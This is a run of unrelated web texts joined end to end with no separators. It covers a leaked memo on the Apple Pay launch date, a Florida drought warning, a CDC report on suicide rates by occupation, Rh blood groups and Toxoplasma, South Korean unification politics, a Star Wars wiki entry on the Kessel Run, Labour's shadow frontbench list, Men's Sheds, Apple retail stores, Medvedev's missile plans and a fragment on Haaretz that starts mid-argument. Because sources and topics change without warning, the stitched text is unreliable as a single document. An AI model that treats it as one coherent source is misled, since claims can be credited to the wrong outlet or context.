A leaked internal memo to employees of drugstore chain Walgreens suggests Apple 's new Apple Pay electronic payments service will go live on Saturday , October 18 .
MacRumors :
A Saturday launch is unusual , but it could make sense as Apple Pay is designed for in-store shopping and a weekend debut would give customers time to try the service . It is , however , also possible that Apple Pay will go live shortly before the October 18 date , following the company 's Thursday , October 16 iPad event , with support coming to Walgreens a day or two later .
Apple is expected to debut a new iPad , Retina display iMacs , and possibly a new Retina iPad mini at their event on Thursday .
Walgreens is one of a number of Apple Pay launch partners , which also includes McDonald 's , Macy 's , Staples , and others .
Apple Pay is expected to be enabled on the iPhone 6 and iPhone 6 Plus via an update to iOS 8. iOS 8.1 had been seeded to developers in two betas so far . If Apple Pay is indeed set to launch on the 18th , iOS 8.1 would need to launch sometime this week .
MIAMI ( CBSMiami ) — The severe drought continues across part of the state with the latest drought monitor showing 34 percent of the state under a severe drought .
With little rainfall in the forecast the drought will continue with the main concerns being fire weather danger and the potential water shortage situation across South Florida .
Lake Okeechobee 's water level has rapidly decreased and although it remains above the water shortage threshold , a water shortage warning has been declared by the South Florida Water Management District .
The chairman of the South Florida Water Management District Dan O'Keefe said , “ The purpose of the warning is the urge South Florida residents to voluntarily conserve more water . This effort will help your water supply last through the remainder of the dry season . ”
Landscape irrigation conservation measures have proven to be the most beneficial to water conservation and a recommended water table is available through their website based on location .
Periods of low humidity and windy weather will also lead to an increase in the fire danger due to the current drought situation .
There is currently a burn ban for open flames and campfires on all public land in the district .
The lake level typically continues to drop until the beginning of June , the start of the wet season . Should there be a lack of early season rainfall and the lake level continues to drop then mandatory water restrictions may go into effect .
Click here to learn more about voluntary water shortage practices .
Analysis of 2012 National Violent Death Reporting System data from 17 states indicated that workers in the farming , fishing , and forestry occupational group had the highest rate of suicide ( 84.5 per 100,000 ) , followed by workers in construction and extraction ( 53.3 ) , and installation , maintenance , and repair ( 47.9 ) . Among males , farming , fishing , and forestry also accounted for the highest rates of suicide ( 90.5 per 100,000 ) , whereas the highest rate among females ( 14.1 ) was among workers in the protective service occupational group .
In 2012 , suicide was the 10th leading cause of death among persons aged ≥16 years in the United States , with approximately 40,000 suicide deaths reported among persons aged ≥16 years . From 2000 to 2012 , rates of suicide for persons aged ≥16 years increased 21.1 % , from 13.3 per 100,000 to 16.1 . Understanding suicides by occupational group provides an opportunity for prevention , but such data have not been reported recently for a broad population or examined by sex and occupation classification .
In 2012 , approximately 40,000 suicides were reported in the United States , making suicide the 10th leading reported cause of death for persons aged ≥16 years ( 1 ) . From 2000 to 2012 , rates of suicide among persons in this age group increased 21.1 % , from 13.3 per 100,000 to 16.1 ( 1 ) . To inform suicide prevention efforts , CDC analyzed suicide by occupational group , by ascribing occupational codes to 12,312 suicides in 17 states in 2012 from the National Violent Death Reporting System ( NVDRS ) ( 2 ) . The frequency of suicide in different occupational groups was examined , and rates of suicide were calculated by sex and age group for these categories . Persons working in the farming , fishing , and forestry group had the highest rate of suicide overall ( 84.5 per 100,000 population ) and among males ( 90.5 ) ; the highest rates of suicide among females occurred among those working in protective service occupations ( 14.1 ) . Overall , the lowest rate of suicide ( 7.5 ) was found in the education , training , and library occupational group . Suicide prevention approaches directed toward persons aged ≥16 years that enhance social support , community connectedness , access to preventive services , and the reduction of stigma and barriers to help-seeking are needed .
CDC 's National Violent Death Reporting System ( NVDRS ) collects information on violent deaths , including suicides , from multiple sources , including death certificates , coroner and medical examiner reports , and law enforcement reports , to monitor trends , understand violent death characteristics and risk factors , and inform prevention efforts ( 2 ) . The most recent NVDRS data set available for analysis ( 2012 ) includes data from 17 states . *
NVDRS Occupation Title and Industry Title fields were used to assign each suicide decedent to one of the major occupational groups defined by the national Standard Occupational Classification ( SOC ) system ( 3 ) . The decedent 's usual occupation at the time of death was coded , and each decedent was assigned to only one occupational group . Additional codes for decedents who were classified as homemakers/housewives , students , never worked/disabled ( and not working ) , retired , prisoners , unemployed , and self-employed ( unspecified industry ) were created by the authors .
Decedents were assigned to SOC codes using three steps . First , the National Institute for Occupational Safety and Health 's Industry and Occupation Computerized Coding System ( NIOCCS ) ( 4 ) was applied to the 12,312 suicides in the data set , resulting in SOC codes for 5,532 ( 44.9 % ) decedents ( Figure ) . NIOCCS matched the industry and occupation text fields to U.S. Census Industry and Occupation codes† ; these were mapped to detailed SOC codes , which the authors collapsed into major SOC occupational groups . Next , a computer algorithm ( developed based on a review of cases for which a SOC code was not provided by NIOCCS ) was used to produce codes for an additional 4,572 ( 37.1 % ) decedents.§ Finally , manual coding by the authors was used for the remaining 2,208 ( 17.9 % ) decedents ( Figure ) . For 729 ( 5.9 % ) decedents , the occupation fields were blank or lacked sufficient information ; these were coded as “ unknown. ” Interrater reliability was assessed for a random 5 % sample ( 635 decedents ) of the data set , with resulting Cohen 's kappa coefficient of 0.87 ( 554 decedents ) ; the remaining 81 decedents not in agreement were resolved through discussions among the authors .
Descriptive data were analyzed , including the number of suicides and rates of suicide by occupational group . Occupational groups were stratified by sex , and rates of suicide were calculated for each group using denominators derived from the U.S. Census Bureau 's Current Population Survey March Supplement ( 5 ) , which includes a question about the person 's primary occupation during the previous calendar year . Rates were not calculated for occupation codes created by the authors , because the Current Population Survey data set does not provide denominator data for these groups . U.S. child labor laws prohibit persons aged < 16 years from working full-time ; therefore , only decedents aged ≥16 years were included . SOC code 55 ( i.e. , military specific occupations ) was not included in the analysis because it was not possible to reliably determine whether these decedents were on active duty or retired , or what occupation they held in the military . If a decedent had a specific coded job and was employed by the military , that decedent was coded according to the occupation ( e.g. , an engineer working for the military would be included in the “ Architecture and engineering ” occupational group ) .
Among the 12,312 suicide decedents included in the 2012 data set , 9,509 ( 77.2 % ) were male , and 2,801 ( 22.8 % ) were female ; information about sex was missing for two decedents ( Table 1 ) . Decedents ranged in age from 16 to 102 years ; however , 84.5 % were aged 16–64 years . Nearly one third of all suicides occurred among persons in the following four occupational groups : construction and extraction ( 1,324 ; 10.8 % ) ; management ( 1,049 ; 8.5 % ) ; production ( 953 ; 7.7 % ) ; and installation , maintenance , and repair ( 780 ; 6.3 % ) ( Table 1 ) . The highest proportion ( 22.7 % ) of suicides occurred among persons aged 45–54 years , and the lowest proportion ( 11.6 % ) occurred among persons aged 16–24 years ( Table 1 ) .
Rates of suicide were highest in the following three occupational groups : farming , fishing , and forestry ( 84.5 suicides per 100,000 persons ) ; construction and extraction ( 53.3 ) ; and installation , maintenance , and repair ( 47.9 ) ( Table 2 ) . Rates of suicide varied by sex , with higher rates among males than females in all occupational groups ( Table 2 ) . Among males , the highest suicide rates were among persons in the following three occupational groups : farming , fishing , and forestry ( 90.5 per 100,000 ) ; construction and extraction ( 52.5 ) ; and installation , maintenance , and repair ( 47.5 ) . Among females , the highest suicide rates occurred among persons in the following three occupational groups : protective service occupations ( e.g. , law enforcement officers and firefighters ) ( 14.1 per 100,000 ) ; legal ( 13.9 ) ; and healthcare practitioners and technical ( 13.3 ) ( Table 2 ) .
The Rh-blood group system in humans is also a typical case . Rh-positive people carry the immunodominant protein RhD with D-antigen ( combination of molecular sections recognized by anti-RhD-antibodies ) on their red blood cells . However , a substantial part of the European population is Rh-negative , i.e . both alleles of the relevant RHD-gene are nonfunctional or altered in Rh-negative people , so that this protein does not appear on their surfaces or the D-antigen ( epitope ) is missing on it . The function of the protein is not known ; however , its structure suggests that it functions as a membrane transporter or rather co-transporter of ammonia or CO 2 ions ( Kustu & Inwood , 2006 ; Biver et al. , 2006 ) . With the exception of haemolytic diseases of Rh-positive babies born to Rh-negative mothers , until 2008 , no effect of Rh-positivity or negativity on the health or any other properties of human beings has been described . The results of three independent studies performed on blood donors , soldiers undergoing compulsory military service and university students indicated , however , that there are very substantial differences between Rh-positive and Rh-negative persons in the rate of reaction to simple stimuli and especially that their reaction rate changes following infection by the parasite Toxoplasma gondii ( Novotná et al . 2008 , Flegr et al . 2008 ) . It was found that , amongst uninfected men , Rh-negative individuals react much faster than Rh-positive individuals . However , the ability to react rapidly to a stimulus decreases in Rh-positive men only minimally following infection by T. gondii , while this decrease is very substantial in Rh-negative men and their reaction times are finally much worse than those of Rh-positive men ( Fig . VIII.8 ) . Approximately 30 % of the people in Europe are infected by T. gondii . A study performed on blood donors showed that , amongst infected persons , the performance of Rh-positive heterozygotes Rh +/– is best , that of Rh-negative Rh -/- homozygotes is worst ( and worsens almost immediately after infection ) and the performance of Rh-positive homozygotes Rh +/+ is only slightly better than that of Rh-negative homozygotes ( but worsens more slowly ) . Thus , it is highly probable that the current occurrence of both alleles of the RHD-gene in the population is maintained in the long term by selection for heterozygotes . Selection for heterozygotes apparently played a great role particularly in the past when an individual 's reaction time could play an important role in the survival and reproduction success of an individual . Selection pressure for Rh-positive heterozygotes , however , apparently still plays a certain role in modern society . When 3900 military drivers were examined for toxoplasmosis and Rh phenotype on entering 1.5-year compulsory military service and the records of the military police were subsequently examined , it was found that Rh-negative persons infected by toxoplasmosis had more than twice the probability of being involved in a traffic accident than uninfected persons or Rh-positive persons . Amongst Rh-negative persons recently infected by toxoplasmosis ( i.e . persons with high anti-toxoplasmosis antibody titres ) the probability of an accident was as much as 5x higher than amongst other persons .
The high proportion of Rh-negative persons in the European population could be connected with the fact that , until recently , big cats ( the definitive host of Toxoplasma gondii ) were practically not present here and thus toxoplasmosis was rare ( and Rh-negative persons were at an advantage compared to the rest of the population ) . The low percentage of Rh-negative persons in Africa ( less than 1 % ) could be related to the high prevalence of toxoplasmosis there , which often approaches 100 % .
Image copyright AFP Image caption Park Geun-hye has told South Korea to be `` prepared for all situations ''
Unification has become something of a buzzword in South Korea this month . President Park Geun-hye emphasised it in her New Year press conference , the opposition Democratic Party did likewise , and journalists , pundits and government officials have followed suit .
But with relations on the peninsula as opaque and as tense as ever , many are wondering what has prompted this latest surge in interest .
If there is one thing the North Korean leader Kim Jong-un made clear when he executed his uncle , it is that he is no more willing to tolerate challenges to his authority than his father or grandfather .
Landmines , watch towers and gun-toting soldiers still line both sides of the demarcation line which separates the two Koreas . And relations between the two neighbours - while currently less chilly than usual - are still far from anything resembling friendship .
So why has South Korea 's president chosen this particular moment to talk about unification ?
Support falling
A clue lies in the language she chose in her New Year press conference . Responding to a prepared question , she said that unification would be a `` jackpot '' for the economy . It was an unusual characterisation .
Image copyright AP Image caption The border between the two Koreas is lined with heavily guarded fences and watch towers
Reunification of Korea , which was divided at the end of World War Two , is official government policy in both the North and the South , though the two governments differ wildly on what a unified Korea would look like .
South Korean presidents have often touted its political , social and ethical value , to balance the considerable cost of absorbing the North .
In choosing to present it as a positive economic `` win '' for South Korea , the president was highlighting a growing problem for politicians here : enthusiasm for reunification is waning .
In the decades since the division of the peninsula , most of those who remember it as one country have died . In their place , new generations of South Koreans have grown up , in a nation of smartphones , slick advertising and global conferences . North Korea , to many of them , seems like a foreign country .
`` President Park is trying to turn a negative into a positive , '' says Bruce Klingner , senior research fellow at the Heritage Foundation and a former Korea specialist at the CIA . `` There 's declining public support for unification overall , and the weakest level of support is amongst the younger generation . That age-group is fiscally very conservative , and they tend to see the fearful cost - unification having a detrimental effect on their own well-being . ''
'Must be prepared '
A recent survey carried out by the Chosun Ilbo , South Korea 's most widely circulated newspaper , suggested that only just over 30 % of the nation thought the benefits of reunification would outweigh the cost , and more than two-thirds did not expect it to benefit individual South Koreans directly .
`` Most people in South Korea are n't ready to think about reuniting with the North yet and I personally do n't feel the need to , '' explained Kim Jung-yoon , an 18-year-old high-school student . `` There 's talk about combining North Korea 's natural resources and the South 's technological prowess , but I think that 's just idealist thinking . If reunification does occur , it 'll just be a burden for the South . ''
Image copyright AFP Image caption North Korean leader Kim Jong-un may view the South 's rhetoric on unification as hostile
Many analysts say that a united Korea would - eventually - create an economic force to be reckoned with . But the initial cost of absorbing the North is estimated to be huge . German unification cost $ 2 trillion and , as many people point out , East Germany was a lot further up the scale of economic integration than North Korea is currently .
So why has Ms Park chosen to polish up unification 's image now ?
`` It 's not one single reason , '' one government official told me , `` but the accumulated events over the past few months , including the execution of Chang Song-thaek , have had an impact on how we perceive North Korea . Unification might be not that far away , and we need to be prepared . ''
President Park has said publicly that the execution of Chang Song-thaek in December 2013 made the situation on the peninsula more unpredictable . `` No one can predict what will happen in North Korea , '' she said , `` and we should be prepared for all situations . ''
One major South Korean newspaper even reported that the country 's intelligence chief told his staff `` in a year-end pep-talk '' that unification could be as soon as next year .
'Hostile take-over '
Few would be that bold ( and even fewer would assert that South Korea is ready for it ) but Bruce Klingner of the Heritage Foundation says Ms Park 's new rhetoric on unification has sparked wild speculation in the US over whether South Korea has behind-the-scenes intelligence that the Pyongyong regime is more unstable than previously thought .
Image copyright AP Image caption A unified Korea would spell the end of the North Korean regime
`` I think it 's more about domestic politics here in Seoul , '' he said , `` it 's the third pillar of her 'trustpolitik ' policy . First , she emphasises strong defence against North Korean provocations ; second , conditional engagement ; and third , working towards eventual unification .
`` Whether that 's how North Korea sees it is a different question . I would think they 'd see it as an attempt by the South to overthrow or undermine Kim Jong-un : not as a diplomatic initiative , but a hostile take-over . ''
Reunification may once have been the abstract goal both sides could bond over . Nowadays , there 's little doubt in many minds that a unified Korea would mean the end of the North Korean regime . Ms Park 's description of it as a `` jackpot '' may not have gone down well in Pyongyang .
But then , as Jung Myung-shik , a Seoul taxi driver in his 60s , observed , South Koreans may not be the only ones losing their taste for unification : `` The North Korean leader is a young man , he 's being treated like a hero across the border , and he can keep that kind of status for many years to come . Why would he be interested in reuniting with the South ? ''
This article is about the hyperlane . You may be looking for the phrase Kessel Run in Deal-slang . This article is about . You may be looking for
`` You 've never heard of the Millennium Falcon ? …It 's the ship that made the Kessel Run in less than twelve parsecs . '' ―Han Solo [ src ]
The Kessel Run was an 18-parsec route used by smugglers to move glitterstim spice from Kessel to an area south of the Si'Klaata Cluster without getting caught by the Imperial ships that were guarding the movement of spice from Kessel 's mines .
Contents show ]
Description Edit
It took travelers in realspace around The Maw leading them to an uninhabitable—but far easier to navigate—area of space called The Pit , which was an asteroid cluster encased in a nebula arm , making sensors as well as pilots go virtually blind . Thus there was a high chance that pilots , weary from the long flight through real space , would crash into an asteroid .
History Edit
The Kessel Run was one of the most heavily used smuggling routes in the Galactic Empire . [ 4 ] Han Solo claimed that his Millennium Falcon `` made the Kessel Run in less than twelve parsecs '' . A parsec is a unit of distance , not time . Solo was not referring directly to his ship 's speed when he made this claim . Instead , he was referring to the shorter route he was able to travel by skirting the nearby Maw black hole cluster , thus making the run in under the standard distance . By moving closer to the black holes , Solo managed to cut the distance down to about 11.5 parsecs. [ source ? ] The smuggler BoShek actually beat Solo 's record in his ship , Infinity , but without cargo to weigh him down . A few months later , Han Solo beat both his own and BoShek 's records in a run he made with Luke Skywalker . [ 3 ]
Behind the scenes Edit
In A. C. Crispin 's Han Solo Trilogy , the Maw cluster of black holes distorts space and time , so the distance of the run is shortened by flying close to it . Han and Chewie make the time ( and distance ) while escaping from an Imperial customs ship .
Development Edit
In the revised fourth draft of A New Hope in 1976 , the description for `` Kessel Run '' is put as follows :
`` It 's the ship that made the Kessel run in less than twelve parsecs ! ''
Ben reacts to Solo 's stupid attempt to impress them with obvious misinformation .
So it implies that the puzzling speech of Han Solo is `` misinformation '' and not truth , and it has nothing to do with the nature of the Kessel Run in any respect . Han means nothing other than impressing Obi-Wan and Luke with pure boasting . Indeed , even in the final version of the script , the parentheses attached to Han 's line state that he is `` obviously lying . ''
In the A New Hope novelization , Han says `` standard time units '' rather than `` parsecs . ''
In the commentary for Star Wars : Episode IV A New Hope DVD , George Lucas mentions that the parsecs are due to the Millennium Falcon 's advanced navigational computer rather than its engines , so the navicomputer would calculate much faster routes than other ships could . Similar info can be found in the notes Lucas recorded together with Carol Titelman in July/August 1977 to start a knowledge database for the planned sequels :
`` It 's a very simple ship , very economical ship , although the modifications he made to it are rather extensive – mostly to the navigation system to get through hyperspace in the shortest possible distance ( parsecs ) . ”
Appearances Edit
Sources Edit
Notes and references Edit
Get the biggest politics stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
It 's been a tumultuous first week for Jeremy Corbyn .
The Labour leader has been beset with headlines over everything from his national anthem silence to his shadow chancellor 's views on the IRA .
At least now it seems things can only get better - as today he finished appointing his huge shadow frontbench team .
Read more :
Aside from the 16 women and 15 men put in the shadow cabinet on Monday , Labour has scores more shadow ministers whose job it will be to hold the Tories to account .
They are drawn from left and right , old and young , Commons and Lords . A spokesman for Jeremy Corbyn said the team is 'inclusive ' and ' a clear commitment to the future of the Party ' .
Here is the full list , as issued by the Labour party this afternoon .
You can scroll down to find out more about the names in bold .
Leader of the Opposition
Jeremy Corbyn MP
( Image : PA )
Business , Innovation & Skills
Angela Eagle MP
Kevin Brennan MP
Stephen Doughty MP
Yvonne Fovargue MP
Chi Onwurah MP [ Joint with DCMS ]
Bill Esterson MP
Gordon Marsden MP [ Joint with Education ]
Lord ( Wilf ) Stevenson
Lord ( Jon ) Mendelsohn
Baroness ( Dianne ) Hayter
Cabinet Office
( Image : Getty )
Tom Watson MP
Gloria De Piero MP
Jon Ashworth MP
Ian Lavery MP
Wayne David MP [ Joint with Scotland , Justice ]
Anna Turley MP
Lousie Haigh MP
Baroness ( Dianne ) Hayter
Communities and Local Government
Jon Trickett MP
Steve Reed MP
Liz McInnes MP
Lord ( Roy ) Kennedy
Lord ( Jeremy ) Beecham
Housing
John Healey MP ( Housing )
Roberta Blackman-Woods MP
Teresa Pearce MP
Lord ( Roy ) Kennedy
Lord ( Jeremy ) Beecham
Culture , Media & Sport
( Image : MDM )
Michael Dugher MP
Chi Onwurah MP [ Joint with BIS ]
Clive Efford MP
Lord ( Wilf ) Stevenson
Defence
Maria Eagle MP
Kevan Jones MP
Toby Perkins MP
Rachel Maskell MP
Rt Hon Lord ( Don ) Touhig
Education
Lucy Powell MP
Pat Glass MP
Nic Dakin MP
Sharon Hodgson MP
Gordon Marsden MP [ Joint with BIS ]
Lord ( Mike ) Watson
Energy and Climate Change
Lisa Nandy MP
Barry Gardiner MP
Alan Whitehead MP
Clive Lewis MP
Baroness ( Bryony ) Worthington
Lord ( John ) Grantchester
Environment , Food and Rural Affairs
Kerry McCarthy MP
Alex Cunningham MP
Nick Smith MP
Baroness ( Maggie ) Jones
Lord ( John ) Grantchester
Foreign and Commonwealth Office
Rt Hon Hilary Benn MP
Rt Hon Pat McFadden MP
Rt Hon David Hanson MP
Diana Johnson MP
Catherine West MP
Lord ( Ray ) Collins
Baroness ( Eluned ) Morgan
Health
Heidi Alexander MP
Luciana Berger MP
Andrew Gwynne MP
Barbara Keeley MP
Justin Madders MP
Rt Hon Lord ( Philip ) Hunt
Home Office
Rt Hon Andy Burnham MP
Jack Dromey MP
Lyn Brown MP
Keir Starmer MP
Sarah Champion MP
Lord ( Richard ) Rosser
Lord ( Roy ) Kennedy
International Development
Diane Abbott MP
Mike Kane MP
Lord ( Ray ) Collins
Justice
Rt Hon Lord ( Charlie ) Falconer QC
Andy Slaughter MP
Jenny Chapman MP
Wayne David MP [ Joint with Scotland , Cab Office ]
Lord ( Willy ) Bach
Lord ( Jeremy ) Beecham
Law Officers
Catherine McKinnell MP
Karl Turner MP
Lord ( Neil ) Davidson QC ­­­­­­­ [ Adv . Gen. Scotland ]
Leader of the House of Commons
( Image : Reuters )
Chris Bryant MP
Melanie Onn MP
Leader of the House of Lords
Rt Hon Baroness ( Angela ) Smith
Rt Hon Lord ( Philip ) Hunt [ Deputy Leader ]
Northern Ireland
Vernon Coaker MP
Stephen Pound MP
Rt Hon Lord ( Tommy ) McAvoy
Scotland
Ian Murray MP
Wayne David MP [ Joint with Justice and Cabinet Office ]
Rt Hon Lord ( Tommy ) McAvoy
Transport
Lilian Greenwood MP
Jonathan Reynolds MP
Richard Burden MP
Daniel Zeichner MP
Lord ( Richard ) Rosser
Treasury
John McDonnell MP
Seema Malhotra MP
Rob Marris MP
Rebecca Long Bailey MP
Richard Burgon MP
Rt Hon Lord ( Bryan ) Davies
Lord ( Denis ) Tunnicliffe
Lord ( Neil ) Davidson
Wales
Nia Griffith MP
Susan Elan Jones MP
Baroness ( Eluned ) Morgan
Women & Equalities Office
Kate Green MP
Cat Smith MP
Baroness ( Dianne ) Hayter
Work & Pensions
Owen Smith MP
Emily Thornberry MP
Debbie Abrahams MP
Nick Thomas Symonds MP
Baroness ( Maeve ) Sherlock
Lord ( Bill ) McKenzie
Whips Office
Rt Hon Rosie Winterton MP
Alan Campbell MP ( Deputy Chief Whip )
Mark Tami MP ( Pairing Whip )
Jessica Morden MP
Judith Cummins MP
Vicky Foxcroft MP
Sue Hayman MP
Holly Lynch MP
Conor McGinn MP
Grahame Morris MP
Angela Rayner MP
Jeff Smith MP
Rt Hon Lord ( Steve ) Bassam
Lord ( Denis ) Tunnicliffe
Rt Hon Lord ( Tommy ) McAvoy
Baroness ( Margaret ) Wheeler
Baroness ( Maeve ) Sherlock
Lord ( Ray ) Collins
Baroness ( Eluned ) Morgan
Lord ( Wilf ) Stevenson
Rt Hon Lord ( Don ) Touhig
Lord ( Roy ) Kennedy
Here 's the latest article from the JournalWatch service of The Public Health Advocacy Institute WA , looking at the Men 's Shed movement in Australia and beyond , including a field trip by Dr Melissa Stoneham to her local Men 's Shed . * * * Dr Melissa Stoneham writes : Recently Clare Shann , Deputy CEO of Beyondblue said “ All Australian boys need a shed ; a [ … ]
Here 's the latest article from the JournalWatch service of The Public Health Advocacy Institute WA , looking at the Men 's Shed movement in Australia and beyond , including a field trip by Dr Melissa Stoneham to her local Men 's Shed .
* * *
Dr Melissa Stoneham writes :
Recently Clare Shann , Deputy CEO of Beyondblue said “ All Australian boys need a shed ; a place where he can go , somewhere to clear his head… ”
Clearly this statement rings true , as we have over 700 Men 's Sheds around the country , with some stating that there are 4 new sheds each week .
So why is this movement so popular and what gets discussed in there ? Is it like the Freemasons – with the secret handshake and the rolled-up trouser leg on initiation ? What are these blokes doing in these sheds and why do we need them ?
According to Reinie Cordier from the Faculty of Medicine , Health and Molecular Sciences at James Cook University who recently published in the International Journal of Health Promotion , the Men 's Shed movement plays an important role in addressing the gendered health disparity that males face . Dr Cordier 's article titled Community-based Men 's Sheds : promoting male health , wellbeing and social inclusion in an international context , aimed to gather information about Men 's Sheds , including the people who attend them , the activities held and their social and health dimensions .
Most know that males do n't live as long as women and it seems they are dying from non-communicable and preventable diseases , such as coronary arterial disease , lung cancer and heart diseases . We also know that these diseases are associated with poor health-promoting behaviours such as smoking , excess alcohol consumption , physical inactivity and poor diet .
Cordier explains that some of the reasons men experience poorer health can be linked to some males not seeking help , an attitude of self-reliance and decreased health literacy . Originally , Men 's Sheds were established to provide support to men who had experienced mental health issues , problems with the transition to retirement or a lack of social interaction . Yet , Cordier highlights in the article , that a recent narrative review on Men 's Sheds highlighted a limited body of research about how Men 's Sheds can contribute to wider health and social policy .
To address this gap , the authors contacted 757 Men 's Sheds across the globe . They quizzed them on operational structures , location and other information , the number of members and the type of activities they facilitated as well as health and social activities . A total of 324 ( 42.8 % ) sheds completed the electronic survey in full .
So what did they find ? Interestingly , over 80 % of the sheds targeted vulnerable communities , includingmen who were socially excluded , elderly or experienced mental health issues.There was greater emphasis at international sheds in supporting people who were unemployed , particularly in Ireland . Over 80 % of Australian sheds and almost 70 % of international sheds engaged in community volunteering activities . Regional sheds were more likely to undertake this community based volunteering role . Many invited guest speakers to the sheds , to discuss specialist topics with 42 % of Australian sheds having invited a health professional in the past 12 months . This study identified that the promotion of men 's health and wellbeing is a core activity of many Men 's Sheds . To validate this for myself , I recently visited my local Men 's Shed . As I gingerly poked my head around the corner of a solid looking shed , I saw a group of men chatting happily and repairing a couple of old bikes . They told me they were going to give them to the local school to raffle off amongst the students . There were some old computers in a thousand pieces and a range of woodworking tools my dad , as an ex manual arts teacher , would have been proud to call his own . The men were tinkering , chatting and most importantly , smiling . I asked around to see who was there – we had an ex university lecturer , a couple of retired teachers , some younger blokes who were currently looking for work and a retired policeman – among others . One elderly man told me the shed brought harmony back into his marriage , and he would certainly have been divorced if he had not had found it ! Another man described the shed as the ‘ pub with no beer ' . The uniting of skills and experience was clear – I was completely satisfied that this little ‘ village ' of men was a safe environment and was promoting social capital through old fashioned mateship . With over 220 sheds across Ireland , 80 across the UK and one even in Alaska , this Australian based ‘ blokes and sheds ' movement which recognises our backyard shed as an integral part of the Australian culture , certainly has made and will continue to make positive impacts on men 's health . Article : Community-based Men 's Sheds : promoting male health , wellbeing and social inclusion in an international context.ReinieCordier and Nathan Wilson ; Health Promotion International ; 2014 ; 29 ( 3 ) :483-93 * * * About JournalWatch The Public Health Advocacy Institute WA ( PHAIWA ) JournalWatch service reviews 10 key public health journals on a monthly basis , providing a précis of articles that highlight key public health and advocacy related findings , with an emphasis on findings that can be readily translated into policy or practice . * * *
PHAIWA is an independent public health voice based within Curtin University , with a range of funding partners . The Institute aims to raise the public profile and understanding of public health , develop local networks and create a statewide umbrella organisation capable of influencing public health policy and political agendas . Visit our website at www.phaiwa.org.au
( Visited 89 times , 1 visits today )
( Photo via Pablo Martinez Piles )
Before Peter Oppenheimer announced earlier this year his plans to retire , Apple 's CFO shared in a scheduled quarterly conference call that Apple Retail would continue to expand its global presence across 2014 . Specifically , Oppenheimer shared that the company will add an addition 30 retail stores this year while remodeling 20 existing stores ; more than half of this expansion would take place outside of the United States .
We 've already seen examples of this happening in places like Turkey where Apple opened its first retail store in Istanbul at the Zorlu Center last month . The company has recently given its long expected Portland “ glass box ” Apple Store at Pioneer Place a proper opening date ( Saturday , May 31st at 10:00 am ) . In addition to the massive new stores in Istanbul and Portland , Apple has also put up the gate seen above around a future retail location in Madrid , Spain , ahead of its anticipated opening next month…
Apple 's retail arm of the company has recently been introduced to a new wind of change , of course , as Angela Ahrendts officially joined the company leaving her CEO position at Burberry to lead the brick-and-mortar and digital stores as SVP of Retail and Online Stores at Apple .
We recently profiled Ahrendts ' transition from Burberry CEO to head of Apple 's Online and Retail Stores including her emphasis on China , mobile payments , and revamping the Apple Store experience since Ron Johnson and John Browett were at the helm of the ship . As we noted then , Apple current has ten official Apple Stores in China and expects that count to triple to thirty by the end of 2016 .
Apple 's current Pioneer Place location Apple 's future Pioneer Place location ( via Cabel Sasser )
Bloomberg recently sat down with Bohlin Cywinski Jackson Principal Peter Bohlin to discuss his role in architecting the original iconic Apple Store locations alongside Steve Jobs :
Earlier this year , Apple added to its list of international retail locations by launching its first store in Brazil . The grand opening of the store in Rio de Janeiro is said to have been attended by an estimated 1,700 people .
( Pioneer Place Image Credit )
Russian President Dmitry Medvedev vowed to deploy missiles near Poland in response to U.S. plans for a European shield during a speech on Wednesday . ( ( Ivan Sekretarev/Associated Press ) ) Russia will deploy short-range missiles in the Baltic Sea region near the border with Poland in response to plans by the United States to build an anti-missile system in Europe , President Dmitry Medvedev said on Wednesday .
The proposed U.S. anti-missile system , which would include 10 missile silos in Poland and a radar station in the Czech Republic to help detect and shoot down any ballistic missiles , threatens Russia 's national security , Medvedev said in his state-of-the-nation address on Wednesday .
`` To neutralize — if necessary — the [ U.S. ] anti-missile system , an Iskander missile system will be deployed in the Kaliningrad region , '' Medvedev said . `` Naturally , we are also considering using for the same purpose the resources of Russia 's navy . ''
Czech Foreign Minister Karel Schwarzenberg said if Russia went ahead with the deployment it would worsen the atmosphere for any international dialogue in the region .
Lithuanian President Valdus Adamkus issued a statement saying Russia 's plan was beyond comprehension .
But in Poland , Prime Minister Donald Tusk played down the plan .
`` We have been used to the fact that Russia growls every now and then , '' Tusk said . `` I would not give too much meaning to this declaration . ''
No details on deployment
Russia will be scrapping its plans to decommission three Cold War-era missile regiments and will be developing systems to electronically jam elements of the proposed anti-missile system , he said .
`` Mechanisms must be created to block mistaken , egoistical and sometimes simply dangerous decisions of certain members of the international community , '' he said .
Medvedev did not disclose how many of the short-range missiles will be deployed or whether they will be fitted with nuclear warheads .
Russia 's nuclear arsenal has the capability to hit targets anywhere in the world but the Iskander missiles have a range of up to 400 kilometres and pose a greater threat to eastern Europe than the United States .
The `` new configuration for the military forces '' in relation to Russia 's missile plan have already been approved , he said .
Russia threatened by Western militaries : Medvedev
Shop assistants watch Russian President Dmitry Medvedev making the address to the nation on Wednesday . ( ( Mikhail Metzel/Associated Press ) ) During the speech , Medvedev painted Russia as a country threatened by growing Western military might .
`` From what we have seen in recent years , the creation of a missile defence system , the encirclement of Russia with military bases , the relentless expansion of NATO , we have gotten the strong impression that they are testing our strength , '' Medvedev said .
President-elect Barack Obama 's administration must take steps to improve U.S. ties with Russia , he said .
`` I stress that we have no problem with the American people , no inborn anti-Americanism and we hope that our partners , the U.S. administration , will make a choice in favour of full-fledged relations with Russia , '' Medvedev said .
Russian-American relations have been increasingly tense and were driven to a post-Cold War low by Moscow 's war with U.S. ally Georgia earlier this year .
`` Medvedev was very assertive in his delivery , '' said Ronald Smith , chief strategist at Alfa Bank in Moscow . `` [ He ] appeared to be staking out strong positions on various issues ahead of the entry of the new American presidential administration . ''
Extended presidential term proposed
During the speech , Medvedev also proposed extending the presidential term from four years to six to allow the government to more effectively implement reforms .
He said the change would be phased in first as five years and then bumped up to six and that the parliament 's term should also be extended from four years to five with a requirement that cabinet report to legislators more regularly .
The proposals are Medvedev 's first major initiative to amend the constitution since he was elected in March to succeed his longtime mentor , Vladimir Putin .
Putin has also said in the past that the presidential term should be increased .
If there is such ploy , it does n't seem to be working . Last week , on the eve of Israel 's Memorial Day , a day of somber reflection , Haaretz was at it again . One article by a leading columnist explained that he could no longer fly the Israeli flag . Another seemed to be calling for a civil war . These are not exceptions ; they are the rule for a newspaper that in recent years has come to rely on provocation .
Its provocations aim to serve its ideology . Haaretz and its core readership are fiercely opposed to Israel 's occupation of the West Bank , to the government 's support for settlers there , to the government 's recalibration of the High Court , to Israel 's state-religion status quo and to other conservative trends .
